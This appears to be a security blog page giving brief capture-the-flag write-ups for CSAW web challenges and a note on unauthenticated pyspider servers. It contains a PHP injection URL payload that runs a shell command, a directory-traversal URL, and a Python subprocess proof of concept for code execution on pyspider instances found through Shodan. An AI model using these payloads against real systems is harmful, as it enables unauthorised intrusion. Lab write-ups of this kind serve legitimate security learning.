namhb

mfw (125)
This main url:
http://web.chal.csaw.io:8000

Fuzz it to easy:
http://web.chal.csaw.io:8000/?page=about%27.phpinfo%28%29.%27

Play with flag
http://web.chal.csaw.io:8000/?page=about%27.system%28%22cat%20templates/flag.php%22%29.%27
flag{3vald_@ss3rt_1s_best_a$$ert}


wtf.sh 1 (150)

http://web.chal.csaw.io:8001
Register one account, logined.
Create post, view post
Fuzzing now, i found directory traversal (WTF? traversal again)
When fuzz to: http://web.chal.csaw.io:8001/post.wtf?post=zabOA/../../ I found some source code. I guess may be can read all file in this directoty, like cat * :)).

I found some interesting function (after use decoder to view beautifull code):

function hash_password {
    local password=$1;
    (shasum <<< ${password}) | cut -d\  -f1;
}
# hash usernames for lookup in the users_lookup table
function hash_username {
    local username=$1;
    (shasum <<< ${username}) | cut -d\  -f1;
}
# generate a random token, base64 encoded
# on GNU base64 wraps at 76 …

Today i read one articles about exploit debug mode in Werkzeug. It old, but very interesting. When i try to find website in shodan, i found 30s website use pyspider. Pyspider is python opensource, you can download and install it from: https://github.com/binux/pyspider
It had one problem, it not authentication. Anyone can access.

When click to one process, you can go to debug mode. And you can edit python code. So, you can use it to run code execute. It is RCE.


This is my POC:
       import subprocess
        p = subprocess.Popen(["id","-m"], stdout=subprocess.PIPE)
        output, err = p.communicate()
        print(output)
---------------------------------------------------------- Thanks for reading -------------------------------------------------------------------------- Security Research SecurityLab - Linux Lab -- Window and Cisco Lab to be continued - I will update more.